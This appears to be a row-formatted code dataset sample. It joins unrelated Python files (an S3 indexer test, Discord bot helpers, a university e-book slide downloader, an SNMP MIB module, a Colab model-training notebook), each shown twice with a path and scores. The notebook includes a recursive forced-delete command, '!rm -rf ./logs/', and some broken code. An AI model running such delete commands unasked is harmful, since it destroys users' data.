self.s3_client_patcher = patch(__name__ + '.index.make_s3_client', return_value=self.s3_client)
self.s3_client_patcher.start()
self.s3_stubber = Stubber(self.s3_client)
self.s3_stubber.activate()
self.env_patcher = patch.dict(os.environ, {
'ES_HOST': 'example.com',
'AWS_ACCESS_KEY_ID': 'test_key',
'AWS_SECRET_ACCESS_KEY': 'test_secret',
'AWS_DEFAULT_REGION': 'ng-north-1',
})
self.env_patcher.start()
def tearDown(self):
self.env_patcher.stop()
self.s3_stubber.assert_no_pending_responses()
self.s3_stubber.deactivate()
self.s3_client_patcher.stop()
self.requests_mock.stop()
def test_test_event(self):
"""
Check that the indexer doesn't do anything when it gets S3 test notification.
"""
event = {
"Records": [{
"body": json.dumps({
"Message": json.dumps({
"Event": "s3:TestEvent"
})
})
}]
}
index.handler(event, None)
def test_index(self):
"""
Index a single text file.
"""
event = {
"Records": [{
"body": json.dumps({
"Message": json.dumps({
"Records": [{
"eventName": "s3:ObjectCreated:Put",
"s3": {
"bucket": {
"name": "test-bucket"
},
"object": {
"key": "hello+world.txt",
"eTag": "123456"
}
}
}]
})
})
}]
}
now = datetime.now()
metadata = {
'helium': json.dumps({
'comment': 'blah',
'user_meta': {
'foo': 'bar'
},
'x': 'y'
})
}
self.s3_stubber.add_response(
method='head_object',
service_response={
'Metadata': metadata,
'ContentLength': 100,
'LastModified': now,
},
expected_params={
'Bucket': 'test-bucket',
'Key': 'hello world.txt',
'IfMatch': '123456',
}
)
self.s3_stubber.add_response(
method='get_object',
service_response={
'Metadata': metadata,
'ContentLength': 100,
'LastModified': now,
'Body': BytesIO(b'Hello World!'),
},
expected_params={
'Bucket': 'test-bucket',
'Key': 'hello world.txt',
'IfMatch': '123456',
'Range': 'bytes=0-2000',
}
)
def es_callback(request):
actions = [json.loads(line) for line in request.body.splitlines()]
assert actions == [{
'index': {
'_index': 'test-bucket',
'_type': '_doc',
'_id': 'hello world.txt:None'
},
}, {
'comment': 'blah',
'content': 'Hello World!',
'etag': '123456',
'event': 's3:ObjectCreated:Put',
'ext': '.txt',
'key': 'hello world.txt',
'last_modified': now.isoformat(),
'meta_text': 'blah {"x": "y"} {"foo": "bar"}',
'size': 100,
'system_meta': {'x': 'y'},
'target': '',
'updated': ANY,
'user_meta': {'foo': 'bar'},
'version_id': None
}]
response = {
'items': [{
'index': {
'status': 200
}
}]
}
return (200, {}, json.dumps(response))
self.requests_mock.add_callback(
responses.POST,
'https://example.com:443/_bulk',
callback=es_callback,
content_type='application/json'
)
index.handler(event, MockContext()) | lambdas/es/indexer/test/test_index.py | from datetime import datetime
from io import BytesIO
import json
import os
from unittest import TestCase
from unittest.mock import ANY, patch
import boto3
from botocore import UNSIGNED
from botocore.client import Config
from botocore.stub import Stubber
import responses
from .. import index
class MockContext():
def get_remaining_time_in_millis(self):
return 30000
class TestIndex(TestCase):
def setUp(self):
self.requests_mock = responses.RequestsMock(assert_all_requests_are_fired=False)
self.requests_mock.start()
# Create a dummy S3 client that (hopefully) can't do anything.
self.s3_client = boto3.client('s3', config=Config(signature_version=UNSIGNED))
self.s3_client_patcher = patch(__name__ + '.index.make_s3_client', return_value=self.s3_client)
self.s3_client_patcher.start()
self.s3_stubber = Stubber(self.s3_client)
self.s3_stubber.activate()
self.env_patcher = patch.dict(os.environ, {
'ES_HOST': 'example.com',
'AWS_ACCESS_KEY_ID': 'test_key',
'AWS_SECRET_ACCESS_KEY': 'test_secret',
'AWS_DEFAULT_REGION': 'ng-north-1',
})
self.env_patcher.start()
def tearDown(self):
self.env_patcher.stop()
self.s3_stubber.assert_no_pending_responses()
self.s3_stubber.deactivate()
self.s3_client_patcher.stop()
self.requests_mock.stop()
def test_test_event(self):
"""
Check that the indexer doesn't do anything when it gets S3 test notification.
"""
event = {
"Records": [{
"body": json.dumps({
"Message": json.dumps({
"Event": "s3:TestEvent"
})
})
}]
}
index.handler(event, None)
def test_index(self):
"""
Index a single text file.
"""
event = {
"Records": [{
"body": json.dumps({
"Message": json.dumps({
"Records": [{
"eventName": "s3:ObjectCreated:Put",
"s3": {
"bucket": {
"name": "test-bucket"
},
"object": {
"key": "hello+world.txt",
"eTag": "123456"
}
}
}]
})
})
}]
}
now = datetime.now()
metadata = {
'helium': json.dumps({
'comment': 'blah',
'user_meta': {
'foo': 'bar'
},
'x': 'y'
})
}
self.s3_stubber.add_response(
method='head_object',
service_response={
'Metadata': metadata,
'ContentLength': 100,
'LastModified': now,
},
expected_params={
'Bucket': 'test-bucket',
'Key': 'hello world.txt',
'IfMatch': '123456',
}
)
self.s3_stubber.add_response(
method='get_object',
service_response={
'Metadata': metadata,
'ContentLength': 100,
'LastModified': now,
'Body': BytesIO(b'Hello World!'),
},
expected_params={
'Bucket': 'test-bucket',
'Key': 'hello world.txt',
'IfMatch': '123456',
'Range': 'bytes=0-2000',
}
)
def es_callback(request):
actions = [json.loads(line) for line in request.body.splitlines()]
assert actions == [{
'index': {
'_index': 'test-bucket',
'_type': '_doc',
'_id': 'hello world.txt:None'
},
}, {
'comment': 'blah',
'content': 'Hello World!',
'etag': '123456',
'event': 's3:ObjectCreated:Put',
'ext': '.txt',
'key': 'hello world.txt',
'last_modified': now.isoformat(),
'meta_text': 'blah {"x": "y"} {"foo": "bar"}',
'size': 100,
'system_meta': {'x': 'y'},
'target': '',
'updated': ANY,
'user_meta': {'foo': 'bar'},
'version_id': None
}]
response = {
'items': [{
'index': {
'status': 200
}
}]
}
return (200, {}, json.dumps(response))
self.requests_mock.add_callback(
responses.POST,
'https://example.com:443/_bulk',
callback=es_callback,
content_type='application/json'
)
index.handler(event, MockContext()) | 0.61659 | 0.260895 |
from enum import Enum
import random
from tokenize import String
import strings as Strings
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
import config as Config
import strings as Strings
from youtube_search import YoutubeSearch
import json
import discord
def playType(message):
url = message.replace(Strings.BOT_PREFIX +
Strings.BOT_PLAY, Strings.EMPTY_STRING).strip()
if Strings.YOUTUBE_URL in url:
return url
elif Strings.SPOTIFY_URL in url:
spotifyUrl = getSongName(url)
spotifyUrl = Strings.YOUTUBE_URL + spotifyUrl
return spotifyUrl
else:
return Strings.MESSAGE_UNKNOWN
def getSongName(song):
sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(
client_id=Config.SPOTIFY_DEV_ID, client_secret=Config.SPOTIFY_DEV_SECRET))
results = sp.track(song)
songName = results[Strings.SPOTIFY_NAME]
uri = results[Strings.SPOTIFY_URI]
songArtist = sp.track(uri)
artist = songArtist[Strings.SPOTIFY_ARTIST]
jsonPart = json.dumps(artist)
findArtist = sp.artist(jsonPart[32:86])
youtubeArtist = findArtist[Strings.SPOTIFY_NAME]
youtubeSearch = YoutubeSearch(
f'{songName} {youtubeArtist}', max_results=1).to_json()
youtubeResult = youtubeSearch.split(':')
youtubeLinkLast = youtubeResult[len(
youtubeResult)-1].replace('"}]}', '')
youtubeLink = youtubeLinkLast.replace('"/', '')
youtubeURL = youtubeLink.strip()
return youtubeURL
async def checkConnectedChannel(ctx):
vc = ctx.voice_client
if not vc or not vc.is_connected():
return await ctx.send(Strings.MESSAGE_NOT_CONNECTED, delete_after=20)
async def sendSuffeledTeamEmbedMessage(ctx, members):
if len(members) == 10:
random.shuffle(members)
embed = discord.Embed(title=Strings.EMBED_TITLE,
description=Strings.EMBED_DESC, color=0x80ffff)
embed.add_field(name=Strings.EMBED_FIELD_1,
value=f"{members[0:5]}", inline=False)
embed.add_field(name=Strings.EMBED_FIELD_2,
value=f"{members[5:10]}", inline=False)
await ctx.send(embed=embed)
else:
await ctx.send(f'**{Strings.MESSAGE_WARNING}** \n `{Strings.MESSAGE_NOT_ENOUGH_PLAYER}`') | BotUtils.py | from enum import Enum
import random
from tokenize import String
import strings as Strings
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
import config as Config
import strings as Strings
from youtube_search import YoutubeSearch
import json
import discord
def playType(message):
url = message.replace(Strings.BOT_PREFIX +
Strings.BOT_PLAY, Strings.EMPTY_STRING).strip()
if Strings.YOUTUBE_URL in url:
return url
elif Strings.SPOTIFY_URL in url:
spotifyUrl = getSongName(url)
spotifyUrl = Strings.YOUTUBE_URL + spotifyUrl
return spotifyUrl
else:
return Strings.MESSAGE_UNKNOWN
def getSongName(song):
sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(
client_id=Config.SPOTIFY_DEV_ID, client_secret=Config.SPOTIFY_DEV_SECRET))
results = sp.track(song)
songName = results[Strings.SPOTIFY_NAME]
uri = results[Strings.SPOTIFY_URI]
songArtist = sp.track(uri)
artist = songArtist[Strings.SPOTIFY_ARTIST]
jsonPart = json.dumps(artist)
findArtist = sp.artist(jsonPart[32:86])
youtubeArtist = findArtist[Strings.SPOTIFY_NAME]
youtubeSearch = YoutubeSearch(
f'{songName} {youtubeArtist}', max_results=1).to_json()
youtubeResult = youtubeSearch.split(':')
youtubeLinkLast = youtubeResult[len(
youtubeResult)-1].replace('"}]}', '')
youtubeLink = youtubeLinkLast.replace('"/', '')
youtubeURL = youtubeLink.strip()
return youtubeURL
async def checkConnectedChannel(ctx):
vc = ctx.voice_client
if not vc or not vc.is_connected():
return await ctx.send(Strings.MESSAGE_NOT_CONNECTED, delete_after=20)
async def sendSuffeledTeamEmbedMessage(ctx, members):
if len(members) == 10:
random.shuffle(members)
embed = discord.Embed(title=Strings.EMBED_TITLE,
description=Strings.EMBED_DESC, color=0x80ffff)
embed.add_field(name=Strings.EMBED_FIELD_1,
value=f"{members[0:5]}", inline=False)
embed.add_field(name=Strings.EMBED_FIELD_2,
value=f"{members[5:10]}", inline=False)
await ctx.send(embed=embed)
else:
await ctx.send(f'**{Strings.MESSAGE_WARNING}** \n `{Strings.MESSAGE_NOT_ENOUGH_PLAYER}`') | 0.34798 | 0.064772 |
import re
import time
import json
from tqdm import tqdm
import requests
from bs4 import BeautifulSoup
import img2pdf
class Bookq():
URL = 'https://bookq.s.kyushu-u.ac.jp'
def __init__(self):
self._session = None
def login(self, secrets_file :str='secrets.json'):
"""Log in to BookQ.
Args:
secrets_file (str): Path to the json file containing your ID and password.
"""
with open(secrets_file, 'r') as f:
secrets = json.load(f)
self._session = requests.session()
login = self._session.get(f'{Bookq.URL}/login')
soup = BeautifulSoup(login.text, 'html.parser')
csrf = soup.select_one('input[name=_csrf]').get('value')
login = self._session.post(f'{Bookq.URL}/login', data={'userid': secrets['id'], 'password': secrets['<PASSWORD>'],'_csrf': csrf})
def _fetch_imgs(self, book_id :str, page_num :int, sleep_seconds :float) -> list[bin]:
"""Fetch slides from BookQ as image.
Args:
book_id (str): ID assigned to the book(slides).
page_num (int): Number of slides.
sleep_seconds (float): Time interval to fetch each slide.
Returns:
list[bin]: List of binary data of images.
"""
imgs = []
for page in tqdm(range(1, page_num+1)):
request = self._session.get(f'{Bookq.URL}/contents/unzipped/{book_id}_2/OPS/images/out_{page}.jpg', stream=True)
if request.status_code == 200:
imgs.append(request.content)
time.sleep(sleep_seconds)
else:
break
return imgs
def get_pdf(self, book_url :str, page_num :int, file_name :str='output.pdf', sleep_seconds :float=1):
"""Get slides from BookQ as pdf.
Args:
book_url (str): URL assigned to the book(slides).
page_num (int): Number of slides.
file_name (str): Name of output file.
sleep_seconds (float): Time interval to fetch each slide.
"""
book_id = re.findall(r'contents=.+', book_url)[0].replace('contents=', '')
imgs = self._fetch_imgs(book_id, page_num, sleep_seconds=sleep_seconds)
with open(file_name,'wb') as f:
f.write(img2pdf.convert(imgs))
print(f'\"{file_name}\" is generated.') | bookq2pdf.py | import re
import time
import json
from tqdm import tqdm
import requests
from bs4 import BeautifulSoup
import img2pdf
class Bookq():
URL = 'https://bookq.s.kyushu-u.ac.jp'
def __init__(self):
self._session = None
def login(self, secrets_file :str='secrets.json'):
"""Log in to BookQ.
Args:
secrets_file (str): Path to the json file containing your ID and password.
"""
with open(secrets_file, 'r') as f:
secrets = json.load(f)
self._session = requests.session()
login = self._session.get(f'{Bookq.URL}/login')
soup = BeautifulSoup(login.text, 'html.parser')
csrf = soup.select_one('input[name=_csrf]').get('value')
login = self._session.post(f'{Bookq.URL}/login', data={'userid': secrets['id'], 'password': secrets['<PASSWORD>'],'_csrf': csrf})
def _fetch_imgs(self, book_id :str, page_num :int, sleep_seconds :float) -> list[bin]:
"""Fetch slides from BookQ as image.
Args:
book_id (str): ID assigned to the book(slides).
page_num (int): Number of slides.
sleep_seconds (float): Time interval to fetch each slide.
Returns:
list[bin]: List of binary data of images.
"""
imgs = []
for page in tqdm(range(1, page_num+1)):
request = self._session.get(f'{Bookq.URL}/contents/unzipped/{book_id}_2/OPS/images/out_{page}.jpg', stream=True)
if request.status_code == 200:
imgs.append(request.content)
time.sleep(sleep_seconds)
else:
break
return imgs
def get_pdf(self, book_url :str, page_num :int, file_name :str='output.pdf', sleep_seconds :float=1):
"""Get slides from BookQ as pdf.
Args:
book_url (str): URL assigned to the book(slides).
page_num (int): Number of slides.
file_name (str): Name of output file.
sleep_seconds (float): Time interval to fetch each slide.
"""
book_id = re.findall(r'contents=.+', book_url)[0].replace('contents=', '')
imgs = self._fetch_imgs(book_id, page_num, sleep_seconds=sleep_seconds)
with open(file_name,'wb') as f:
f.write(img2pdf.convert(imgs))
print(f'\"{file_name}\" is generated.') | 0.592313 | 0.12943 |
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint")
gnomeProducts, = mibBuilder.importSymbols("GNOME-SMI", "gnomeProducts")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Integer32, TimeTicks, Counter32, Counter64, MibIdentifier, Bits, iso, IpAddress, ObjectIdentity, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Integer32", "TimeTicks", "Counter32", "Counter64", "MibIdentifier", "Bits", "iso", "IpAddress", "ObjectIdentity", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
zebra = ModuleIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2))
if mibBuilder.loadTexts: zebra.setLastUpdated('200004250000Z')
if mibBuilder.loadTexts: zebra.setOrganization('GNOME project')
zserv = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 1))
if mibBuilder.loadTexts: zserv.setStatus('current')
bgpd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 2))
if mibBuilder.loadTexts: bgpd.setStatus('current')
ripd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 3))
if mibBuilder.loadTexts: ripd.setStatus('current')
ripngd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 4))
if mibBuilder.loadTexts: ripngd.setStatus('current')
ospfd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 5))
if mibBuilder.loadTexts: ospfd.setStatus('current')
ospf6d = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 6))
if mibBuilder.loadTexts: ospf6d.setStatus('current')
mibBuilder.exportSymbols("GNOME-PRODUCT-ZEBRA-MIB", ospf6d=ospf6d, PYSNMP_MODULE_ID=zebra, ripngd=ripngd, bgpd=bgpd, zserv=zserv, ripd=ripd, zebra=zebra, ospfd=ospfd) | pysnmp/GNOME-PRODUCT-ZEBRA-MIB.py | OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint")
gnomeProducts, = mibBuilder.importSymbols("GNOME-SMI", "gnomeProducts")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Integer32, TimeTicks, Counter32, Counter64, MibIdentifier, Bits, iso, IpAddress, ObjectIdentity, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Integer32", "TimeTicks", "Counter32", "Counter64", "MibIdentifier", "Bits", "iso", "IpAddress", "ObjectIdentity", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
zebra = ModuleIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2))
if mibBuilder.loadTexts: zebra.setLastUpdated('200004250000Z')
if mibBuilder.loadTexts: zebra.setOrganization('GNOME project')
zserv = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 1))
if mibBuilder.loadTexts: zserv.setStatus('current')
bgpd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 2))
if mibBuilder.loadTexts: bgpd.setStatus('current')
ripd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 3))
if mibBuilder.loadTexts: ripd.setStatus('current')
ripngd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 4))
if mibBuilder.loadTexts: ripngd.setStatus('current')
ospfd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 5))
if mibBuilder.loadTexts: ospfd.setStatus('current')
ospf6d = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 6))
if mibBuilder.loadTexts: ospf6d.setStatus('current')
mibBuilder.exportSymbols("GNOME-PRODUCT-ZEBRA-MIB", ospf6d=ospf6d, PYSNMP_MODULE_ID=zebra, ripngd=ripngd, bgpd=bgpd, zserv=zserv, ripd=ripd, zebra=zebra, ospfd=ospfd) | 0.358915 | 0.107017 |
class Character:
"""
Represents a Character with it's aliases and alternative spellings during the books
"""
def __init__(self, ref_name: str, alt_names: list):
"""
:param ref_name: reference name of the Character (displayed in figures, for example)
:param alt_names: list of alternative names and aliases for the Character
"""
self.ref_name = ref_name
self.alt_names = [name for name in alt_names]
def appearance_indices(self, words: list) -> list:
"""
Lists all indices that mark the characters appearance in the given bag of words.
:param words: bag of words to look up the character name in.
:return: list of indices that mark the appearance of the characters name
"""
indices = []
index = 0
while len(words) > index:
idx = index
bigram = ' '.join(words[index:index + 1])
trigram = ' '.join(words[index:index + 2])
if words[idx] in self.alt_names or bigram in self.alt_names or trigram in self.alt_names:
if bigram in self.alt_names:
idx = index + 1
if trigram in self.alt_names:
idx = index + 2
indices.append(idx)
index = idx + 1
return indices
def appears_in(self, words: list) -> bool:
"""
Lists all indices that mark the characters appearance in the given bag of words.
:param words: bag of words to look up the character name in.
:return: list of indices that mark the appearance of the characters name
"""
index = 0
while len(words) > index:
idx = index
bigram = ' '.join(words[index:index + 1])
trigram = ' '.join(words[index:index + 2])
if words[idx] in self.alt_names or bigram in self.alt_names or trigram in self.alt_names:
return True
index = idx + 1
return False
def __repr__(self):
return self.ref_name | src/object/Character.py | class Character:
"""
Represents a Character with it's aliases and alternative spellings during the books
"""
def __init__(self, ref_name: str, alt_names: list):
"""
:param ref_name: reference name of the Character (displayed in figures, for example)
:param alt_names: list of alternative names and aliases for the Character
"""
self.ref_name = ref_name
self.alt_names = [name for name in alt_names]
def appearance_indices(self, words: list) -> list:
"""
Lists all indices that mark the characters appearance in the given bag of words.
:param words: bag of words to look up the character name in.
:return: list of indices that mark the appearance of the characters name
"""
indices = []
index = 0
while len(words) > index:
idx = index
bigram = ' '.join(words[index:index + 1])
trigram = ' '.join(words[index:index + 2])
if words[idx] in self.alt_names or bigram in self.alt_names or trigram in self.alt_names:
if bigram in self.alt_names:
idx = index + 1
if trigram in self.alt_names:
idx = index + 2
indices.append(idx)
index = idx + 1
return indices
def appears_in(self, words: list) -> bool:
"""
Lists all indices that mark the characters appearance in the given bag of words.
:param words: bag of words to look up the character name in.
:return: list of indices that mark the appearance of the characters name
"""
index = 0
while len(words) > index:
idx = index
bigram = ' '.join(words[index:index + 1])
trigram = ' '.join(words[index:index + 2])
if words[idx] in self.alt_names or bigram in self.alt_names or trigram in self.alt_names:
return True
index = idx + 1
return False
def __repr__(self):
return self.ref_name | 0.85186 | 0.700914 |
from google.colab import drive
drive.mount('/content/gdrive/')
import os
import datetime
import random
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import tensorflow as tf
import tensorflow.python.keras.backend as K
from tensorflow.python.keras import Input
from tensorflow.python.keras.models import Sequential, Model, model_from_yaml, load_model
from tensorflow.python.keras.layers import Dense, Flatten, Conv2D, LeakyReLU, concatenate, Dropout
from tensorflow.python.keras.callbacks import Callback, EarlyStopping, LearningRateScheduler, TensorBoard
# Data generator
class DataGenerator(tf.keras.utils.Sequence):
'Generates data for tf.keras'
def __init__(self, batch_size = 64, shuffle = True, datasettype = 'train', permFreq = 0.15, output_type = 'win'):
'Initialization'
self.datasettype = datasettype
if datasettype == 'train':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/train.csv'
elif datasettype == 'val':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/val.csv'
elif datasettype == 'test':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/test.csv'
else:
print("Incorrect datatype")
self.xy = np.loadtxt(self.link, delimiter = ",", dtype = np.float32, skiprows = 1)
np.random.shuffle(self.xy) # Shuffle dataset
self.y = self.xy[:, [0]]
self.f = self.xy[:, 1:6]
self.x = self.xy[:, 6:58]
self.x = self.x.reshape((-1,4,13,1))
self.g = self.xy[:, 58:184]
self.o = self.xy[:, 184:236]
self.o = self.o.reshape((-1,4,13,1))
self.dim = (4,13)
self.batch_size = batch_size
self.shuffle = shuffle
self.indexes = np.arange(self.xy.shape[0])
self.on_epoch_end()
self.permFreq = permFreq
self.output_type = output_type
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(self.xy.shape[0] / self.batch_size))
def __getitem__(self, index_batch):
'Generate one batch of data'
# Generate indexes of the batch
indexes_batch = self.indexes[index_batch*self.batch_size:(index_batch+1)*self.batch_size]
# Generate data
[x, f, g, o], y = self.__data_generation(indexes_batch)
return [x, f, g, o], y
def on_epoch_end(self):
'Updates indexes after each epoch'
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, indexes):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
x = np.empty((self.batch_size, 4,13,1))
f = np.empty((self.batch_size, 5))
g = np.empty((self.batch_size, 126))
o = np.empty((self.batch_size, 4,13,1))
y = np.empty((self.batch_size))
# Generate data
for i, index in enumerate(indexes):
# Random permutation for x and o
r = random.random()
if r < (1-self.permFreq):
x[i,] = self.x[index,]
o[i,] = self.o[index,]
else:
x[i,] = np.array([np.random.permutation(self.x[index,0,])])
o[i,] = np.array([np.random.permutation(self.o[index,0,])])
# f and g
f[i,] = self.f[index,]
g[i,] = self.g[index,]
# output type
if self.output_type == 'win':
if self.y[index,] > 0:
y[i ] = 1
else:
y[i ] = 0
elif self.output_type == 'score':
y[i ] = self.y[index,]
else:
print('Invalid input type')
return [x, f, g, o], y
# TensorBoard
log_dir = "logs/fit/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir = log_dir, histogram_freq = 1)
# Checkpoint callback
checkpoint_path = "gdrive/My Drive/Colab Notebooks/GR-TrainModel/Checkpoint/cp.ckpt"
checkpoint_dir = os.path.dirname(checkpoint_path)
cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,
save_weights_only=True,
verbose=1,
save_freq = 'epoch')
# Step Decay
def step_decay_schedule(initial_lr=1e-3, decay_factor=0.75, step_size=10):
def schedule(epoch):
return initial_lr * (decay_factor ** np.floor(epoch/step_size))
return LearningRateScheduler(schedule)
schedule = step_decay_schedule(initial_lr = 0.001, decay_factor=0.1, step_size = 50)
# Data generator
train_generator = DataGenerator(datasettype = 'train', batch_size = 128, permFreq = 0, output_type = 'score')
valid_generator = DataGenerator(datasettype = 'val', batch_size = 128, permFreq = 0, output_type = 'score')
def DualInception():
x = Input(shape = (4,13,1,), name = 'x')
f = Input(shape = (5,), name = 'f')
g = Input(shape = (126,), name = 'g')
o = Input(shape = (4,13,1,), name = 'o')
# x1 = Flatten(name = 'xflatten')(x)
# o1 = Flatten(name = 'oflatten')(o)
# i = concatenate([x1, f, g, o1], name = 'concat')
y = Dense(1, name = 'y')(f)
model = Model(inputs = [x, f, g, o], outputs = y)
# model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'])
model.compile(loss = 'mse', optimizer = 'adam')
return model
# Commented out IPython magic to ensure Python compatibility.
!rm -rf ./logs/
# %load_ext tensorboard
# %tensorboard --logdir logs/fit
# Model define
NN = DualInception()
NN.summary()
history_NN = NN.fit(x = train_generator,
validation_data = valid_generator,
epochs = 10,
callbacks = [cp_callback, schedule, tensorboard_callback])
test_generator = DataGenerator(datasettype = 'test', batch_size = 128, permFreq = 0, output_type = 'score')
NN.evaluate(test_generator)
"""# **Other model**"""
import matplotlib.pyplot as plt
data2 = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/small_Simple_Last_OHE_noDup_ISRU_geo.csv')
geo = data.iloc[:,58:184]
sumgeo = geo.sum(axis = 1)
sumgeo = np.array(sumgeo).reshape(-1,1)
deadwood = data.Deadwood0
deadwood = np.array(deadwood).reshape(-1,1)
X = np.concatenate((sumgeo,deadwood),axis=1)
model = svm.SVC(probability=True)
model.fit(X, Y)
testDeadwood = np.arange(0, 100)
testDeadwood = testDeadwood.reshape(-1,1)
testGeo = np.full((100, 1), 5, dtype=int)
testX = np.concatenate((testGeo, testDeadwood), axis=1)
testY = model.predict(testX)
plt.plot(testDeadwood, testY)
testDeadwood = np.full((40, 1), 15, dtype=int)
testGeo = np.arange(0, 40)
testGeo = testGeo.reshape(-1,1)
testX = np.concatenate((testGeo, testDeadwood), axis=1)
testY = model.predict(testX)
plt.plot(testGeo, testY)
from sklearn import svm
X = data.Deadwood0
Y = data.win
X = np.array(X).reshape(-1, 1)
model = svm.SVC(probability=True)
model.fit(X, Y)
Yhat = model.predict(X)
1 - sum(Yhat - Y)/16317
testX = np.arange(0, 100)
testX = testX.reshape(-1,1)
testY = model.predict(testX)
model.predict_proba(testX)
plt.plot(testX, testY)
plt.scatter(X, Y)
data["win"] = np.nan
data.loc[data["score0_mean"] > 0 , "win"] = 1
data.loc[data["score0_mean"] <= 0 , "win"] = 0
data
data.describe()
corr_matrix = data.corr()
a = corr_matrix['win']
print(a.sort_values().index)
for i in a.sort_values():
print(i)
import matplotlib.pyplot as plt
plt.figure(figsize=(60,7))
plt.plot(a)
import seaborn as sn
sn.heatmap(a, annot=True)
plt.show()
data = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/1M_Simple_All_OHE_noDup_ISRU_geo_val.csv')
data["win"] = np.nan
data.loc[data["score0_mean"] > 0 , "win"] = 1
data.loc[data["score0_mean"] <= 0 , "win"] = 0
y = np.array(data.win)
y
# f = np.array(data[['GamestateNum', 'RunNum0', 'SetNum0', 'Deadwood0', 'Hitscore0']])
f = np.array(data[['Deadwood0']])
data
f
y
y = y.reshape((-1,1))
model = svm.SVC(probability=True)
model.fit(f, y)
def DualInception():
f = Input(shape = (1,), name = 'f')
h = Dense(8, activation = 'sigmoid', name = 'h')(f)
y = Dense(1, activation = 'sigmoid', name = 'y')(h)
model = Model(inputs = f, outputs = y)
model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'])
return model
# Model define
NN = DualInception()
NN.summary()
history_NN = NN.fit(x = f,
y = y,
epochs = 10)
test.columns
GamestateNumTest = np.full((100, 1), 5, dtype=int)
RunNum0Test = np.full((100, 1), 1, dtype=int)
SetNum0Test = np.full((100, 1), 1, dtype=int)
Deadwood0Test = np.arange(0, 100)
Deadwood0Test = Deadwood0Test.reshape(-1,1)
Hitscore0Test = np.full((100, 1), 10, dtype=int)
testX = np.concatenate((GamestateNumTest, RunNum0Test, SetNum0Test, Deadwood0Test, Hitscore0Test), axis=1)
testY = NN.predict(testX)
data = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/2M_Simple_All_OHE_randomplayer_nodup_ISRU_geo.csv')
data.describe()
data2 = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/small_Simple_Last_OHE_noDup_ISRU_geo.csv')
plt.figure(figsize=(15,7))
plt.scatter(data2.Deadwood0, data2.score0_mean)
plt.figure(figsize=(15,7))
plt.scatter(data.Deadwood0, data.score0_mean)
plt.figure(figsize=(15,7))
plt.scatter(data.Hitscore0, data.score0_mean) | results/SimpleLast/main2_LinearReg.py | from google.colab import drive
drive.mount('/content/gdrive/')
import os
import datetime
import random
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
